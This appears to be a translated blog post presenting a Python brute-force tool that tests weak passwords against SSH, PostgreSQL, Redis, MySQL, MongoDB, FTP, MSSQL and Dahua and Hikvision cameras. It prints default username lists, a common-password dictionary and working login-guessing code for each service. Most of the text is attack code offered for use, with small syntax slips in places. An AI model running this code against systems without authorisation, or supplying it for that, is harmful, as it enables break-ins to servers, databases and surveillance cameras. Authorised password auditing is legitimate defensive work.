Weak password vulnerability
- Weak password tools
-
- Username-password set
- 1. SSH weak password
- 2. postgresql weak password
- 3. redis weak password
- 4. MySQL weak password
- 5. Mongodb weak password
- 6. Weak FTP password
- 7. sqlserver (mssql) weak password
- 8. dahua weak password
- 9. hikvision (Hikvision) weak password
- Tool source code address
Weak password tools
This tool is modified based on the original tool on github. The original tool only has 3 weak password scans. Here it has been increased to 9 weak password scans. The original tool portal
And modified the use of username and password;
This tool can currently perform operations on 9 software/Webs: SSH, postgresql, Redis, MySQL, mongoDB, FTP, sqlserver (mssql), Dahua (Dahua), hikvision (Hikvision) Weak password scanning;
Code language: python3
Username-password set
The username_dict dictionary contains usernames for each category and can be added by yourself;
The passwords_list list is a general password field, where {user} is used to replace the username field and can be added and modified by yourself;
username_dict = {<!-- -->
"ftp": ["ftp", "anonymous"],
# "ftp": ["ftp", "admin", "www", "web", "root", "db", "wwwroot", "data"],
"mysql": ["root", "mysql", "admin", "test"],
"mssql": ["sa"],
# "smb": ["administrator", "admin", "guest"],
# "rdp": ["administrator", "admin", "guest"],
"postgresql": ["postgres", "admin"],
"ssh": ["root", "admin"],
"mongodb": ["root", "admin"],
# "oracle": ["sys", "system", "admin", "test", "web", "orcl"],
"dahua": ["admin", "dahua", "root", "test"],
"hikvision": ["admin"]
}
passwords_list = ["123456", "12345", 'asdf1234', 'abc12345', '12345{user}', "{user}12345", '12345abc' ,"admin", "admin123", "root",
"", "pass123", "pass@123", "password", "123123", "654321", "111111",
"123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user} 1", "{user}111", "{user}123",
"{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", \ "{user}@123#4", "P@ssw0rd!",
"P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@# ", "123456789",
"123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888 ","888888", "!QAZ2wsx",
"1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234." , "Aa12345", "a123456",
"a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX ", "qwe123!@#",
"Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789","pwd@123456"]
1. SSH weak password
Some key codes are as follows:
name, pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=self.host,port=self.port,username=name,password=pwd,timeout=self.timeout)
time.sleep(0.05)
ssh.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout...")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception as e:
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
2. postgresql weak password
Some key codes are as follows:
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
try:
pgscon = psycopg2.connect(host=self.host, port=self.port, user=name, password=pwd)
time.sleep(0.02)
pgscon.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout...")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception as e:
# print(e)
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
3. redis weak password
Redis does not have a user name by default, so only the password collection content is used here.
The key code is as follows:
pwd = self.qlist.get()
if "{user}" in pwd:
pwd = pwd.replace("{user}", "redis")
try:
conn = redis.Redis(host=self.host, port=self.port, password=pwd)
conn.ping()
# time.sleep(0.05)
s = "[OK] :%s" % (pwd)
if pwd == "":
s + = "(no password)"
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout...")
self.qlist.put(':' + pwd)
time.sleep(1)
except Exception as e:
error = "[Error] :%s" % (pwd)
self.show_log(self.host,error)
pass
4. MySQL weak password
The key code is as follows:
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
try:
conn = pymysql.connect(host=self.host, user=name, passwd=pwd, db='mysql', port=self.port)
if conn:
# time.sleep(0.05)
conn.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception as e:
# print(e)
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
5. Mongodb weak password
mongoDB here uses different methods for different pymongo versions. The calling methods before and after version 4.0 are different. The judgment is made here and does not affect
The key code is as follows:
pymongo_ver = pymongo.version
name, pwd = self.qlist.get().split(':')
if"{<!-- -->user}" in pwd:
pwd = pwd.replace("{user}", name)
try:
if int(pymongo_ver.split(".")[0]) >= 4:
conn = pymongo.MongoClient(host=self.host, port=self.port, username=name, password=pwd, socketTimeoutMS=3000)
conn.list_database_names()
else:
conn = pymongo.MongoClient(host=self.host, port=self.port, socketTimeoutMS=3000)
if name or pwd:
db = conn.admin
db.authenticate(name, pwd)
else:
conn.list_database_names()
conn.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout...")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception as e:
# print(e)
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
6. Weak FTP password
Weak FTP passwords are used here to log in anonymously. First try to log in anonymously, and then use the username and password to scan.
The key code is as follows:
# Anonymous login
try:
if not self.is_exit:
ftpclient = ftplib.FTP()
ftpclient.connect(host=self.host, port=self.port)
ftpclient.login()
ftpclient.close()
s = "[OK] %s:%s" % ("Anonymous login", "Anonymous login")
self.show_log(self.host, s)
self.result.append(s)
self.is_exit = True
self.qlist.queue.clear()
except Exception as e:
print("Anonymous login error:", e)
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
try:
ftpclient = ftplib.FTP()
ftpclient.connect(host=self.host, port=self.port, timeout=3)
ftpclient.login(name, pwd)
ftpclient.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception as e:
print(e)
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
7. sqlserver (mssql) weak password
sqlserver is mssql
The key code is as follows:
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
try:
conn = pymssql.connect(host=self.host, port=self.port, user=name, password=pwd)
if conn:
# time.sleep(0.05)
conn.close()
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
except Exception as e:
print(e)
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
8. Dahua weak password
The key code is as follows:
ip = self.host + ":" + self.port
url = f"http://{<!-- -->ip}/RPC2_Login"
headers = {<!-- -->
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
'Host': ip,
'Origin': 'http://' + ip,
'Referer': 'http://' + ip,
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\ ',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Connection': 'close',
'X-Requested-With': 'XMLHttpRequest',
}
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
print(name,pwd)
_json = {<!-- -->
"method": "global.login",
"params": {<!-- -->
"userName": name,
"password": pwd,
"clientType": "Web3.0",
"loginType": "Direct",
"authorityType": "Default",
"passwordType": "Plain",
},
"id": 1,
"session": 0,
}
try:
r = requests.post(url, headers=headers, json=_json, verify=False, timeout=5)
if r.status_code == 200 and r.json()['result'] == True:
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
print("Timeout")
except Exception as e:
print(e)
error = "[Error] %s:%s" % (name,pwd)
self.show_log(self.host,error)
pass
9. hikvision (Hikvision) weak password
The key code is as follows:
ip = self.host + ":" + self.port
url = f"http://{<!-- -->ip}/ISAPI/Security/userCheck"
headers = {<!-- -->
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
'Connection': 'close'
}
name,pwd = self.qlist.get().split(':')
if "{user}" in pwd:
pwd = pwd.replace("{user}", name)
# print(name,pwd)
try:
r = requests.get(url, auth=(name, pwd), timeout=10, headers=headers, verify=False)
print(r.status_code)
print(r.text)
if r.status_code == 200 and 'userCheck' in r.text and 'statusValue' in r.text and '200' in r.text:
s = "[OK] %s:%s" % (name,pwd)
self.show_log(self.host,s)
self.result.append(s)
except socket.timeout:
self.show_log(self.host,"Timeout")
self.qlist.put(name + ':' + pwd)
time.sleep(3)
print("Timeout")
except Exception as e:
print(e)
# error = "[Error] %s:%s" % (name,pwd)
# self.show_log(self.host,error)
pass
Tool source code address
github address: WeakpassScan